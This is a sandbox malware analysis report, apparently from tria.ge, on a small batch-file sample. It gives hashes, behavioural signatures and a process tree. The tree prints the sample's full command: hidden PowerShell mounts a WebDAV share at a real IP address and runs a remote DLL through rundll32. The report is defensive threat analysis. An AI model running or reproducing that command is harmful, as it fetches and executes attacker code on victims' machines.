Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
13/07/2024, 13:44
Static task
static1
Behavioral task
behavioral1
Sample
1216710410164405915.bat
Resource
win7-20240705-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
1216710410164405915.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
1216710410164405915.bat
-
Size
2KB
-
MD5
2cbb3d03bba8dc1ee12f3eaf15b5852a
-
SHA1
5eacde35a8a7245cbeef525e51487d66229aadc3
-
SHA256
0c9fa27264bcc952fa4d3da5ceaee543d6408964ac5f5bbe5c11629c8eb9d28a
-
SHA512
0a612f36544e800fc25f14c6e6ebb4217b733f3a8d27b037f4b25e86d371fc1addcca3e60a27ec69c16c4a4f4a58cb48bbb3d60c694fa2a147fbbac24a079a5d
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2588 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2588 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2984 wordpad.exe 2984 wordpad.exe 2984 wordpad.exe 2984 wordpad.exe 2984 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2756 wrote to memory of 2984 2756 cmd.exe 31 PID 2756 wrote to memory of 2984 2756 cmd.exe 31 PID 2756 wrote to memory of 2984 2756 cmd.exe 31 PID 2756 wrote to memory of 2588 2756 cmd.exe 32 PID 2756 wrote to memory of 2588 2756 cmd.exe 32 PID 2756 wrote to memory of 2588 2756 cmd.exe 32 PID 2588 wrote to memory of 2624 2588 powershell.exe 34 PID 2588 wrote to memory of 2624 2588 powershell.exe 34 PID 2588 wrote to memory of 2624 2588 powershell.exe 34 PID 2588 wrote to memory of 3064 2588 powershell.exe 35 PID 2588 wrote to memory of 3064 2588 powershell.exe 35 PID 2588 wrote to memory of 3064 2588 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1216710410164405915.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3561.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2624
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\3561.dll entry3⤵PID:3064
-
-